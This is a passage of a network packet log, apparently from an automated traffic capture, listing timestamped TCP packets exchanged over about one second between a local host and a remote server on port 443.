                                                          Dec 6, 2024 15:42:38.292275906 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.292284966 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.292294979 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.294925928 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.295017004 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.295026064 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.298269033 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.298341990 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.298350096 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.300815105 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.300873995 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.301261902 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.303533077 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.303591967 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.303602934 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.306014061 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.306077003 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.306085110 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.307662010 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.307707071 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.307713985 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.307786942 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.310280085 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.310352087 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.310359001 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.312891006 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.312966108 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.312977076 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.316329956 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.316406965 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.316416025 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.318511009 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.318572044 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.318583965 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.322056055 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.322118044 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.322129011 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.324448109 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.324512005 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.324531078 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.327003002 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.327121973 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.327138901 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.371952057 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.373889923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.373900890 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.373964071 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.376463890 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.376538038 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.475693941 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.482287884 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.482361078 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.482379913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.484854937 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.484915018 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.484925985 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.487524033 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.487598896 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.487608910 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.487803936 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.490825891 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.490901947 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.493434906 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.493505955 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.493520021 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.493855000 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.496088982 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.496155024 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.498760939 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.498836994 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.498847961 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.502044916 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.502209902 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.502221107 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.504570961 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.504637957 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.504678011 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.507210016 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.507282972 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.507293940 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.510118008 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.510196924 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.510207891 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.512769938 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.512854099 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.512866020 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.515372992 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.515453100 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.515465021 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.518676996 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.519040108 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.519052982 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.559427977 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.571912050 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.572017908 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.573788881 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.573857069 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.573874950 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.621920109 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.675489902 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.675504923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.675571918 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.677062988 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.677071095 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.677134037 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.677560091 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.677613974 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.680844069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.680938005 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.680952072 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.681047916 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.683446884 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.683537006 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.686180115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.686261892 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.686285019 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.688615084 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.688678026 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.688710928 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.691823006 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.691915989 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.691937923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.694432974 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.694494009 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.694510937 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.697050095 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.697130919 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.697154999 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.700448990 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.700506926 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.700526953 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.702600002 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.702655077 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.702668905 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.705888033 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.705959082 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.705974102 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.708657980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.708731890 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.708748102 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.711204052 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.711286068 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.711322069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.764153957 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.764208078 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.764230967 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.764247894 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.764292955 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.766339064 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.766413927 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.766422033 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.767781973 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.808689117 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.866781950 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.866795063 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.866957903 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.869214058 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.869225979 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.869318008 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.869348049 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.872185946 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.872275114 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.872298956 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.874825001 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.874908924 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.874938011 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.877639055 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.877707958 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.877732038 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.880166054 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.880265951 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.880287886 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.883589029 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.883683920 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.883717060 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.885916948 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.885989904 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.886013985 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.888644934 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.888708115 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.888731956 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.891168118 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.891243935 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.891268015 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.894469976 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.894552946 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.894577980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.897448063 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.897517920 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.897541046 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.900299072 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.900363922 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.900386095 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.903007030 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.903078079 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.903100967 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.905324936 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.905390024 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.905407906 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.950082064 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.957442045 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.957459927 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.957568884 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.957598925 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.981563091 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.981693029 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.981718063 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.028208017 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.060378075 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.060399055 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.060539007 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.060568094 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.063409090 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.063420057 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.063499928 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.063513994 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.066060066 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.066107988 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.066133022 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.066148043 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.066169024 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.068607092 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.068686962 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.068694115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.071329117 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.071407080 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.071418047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.074620962 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.074702024 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.074709892 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.077179909 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.077251911 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.077261925 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.079925060 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.080027103 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.080035925 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.082421064 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.082489014 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.082496881 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.085797071 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.085864067 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.085872889 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.088037014 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.088107109 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.088114977 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.091403961 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.091483116 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.091492891 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.093872070 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.093940020 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.093950987 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.096630096 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.096712112 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.096720934 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.148837090 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.148943901 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.148968935 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.151343107 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.151417971 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.151431084 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.151454926 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.151496887 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.251842022 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.251935959 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.251969099 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.254307032 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.254374981 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.254384995 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.256916046 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.257004023 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.257016897 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.260241032 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.260308981 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.260315895 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.262974024 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.263060093 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.263070107 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.267074108 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.267146111 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.267155886 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.268743992 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.268807888 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.268815994 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.271434069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.271507025 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.271517038 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.274143934 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.274216890 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.274225950 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.276648045 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.276705980 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.276715994 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.284734011 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.284797907 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.284810066 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.286355019 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.286421061 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.286432981 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.287269115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.287331104 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.287341118 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.289527893 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.289601088 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.289609909 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.340692997 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.345558882 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.345573902 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.345624924 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.345638990 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.345668077 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.345683098 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.345710993 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.443983078 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.444082975 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.444116116 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.446429968 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.446511984 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.446537018 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.447761059 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.449078083 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.449152946 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.449162006 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.451669931 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.451745987 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.451765060 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.452426910 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.454675913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.454740047 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.454751968 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.456913948 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.456975937 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.456988096 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.459238052 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.460223913 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.460316896 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.460329056 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.462734938 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.462807894 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.462821960 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.464333057 CET49794443192.168.2.11101.99.75.174
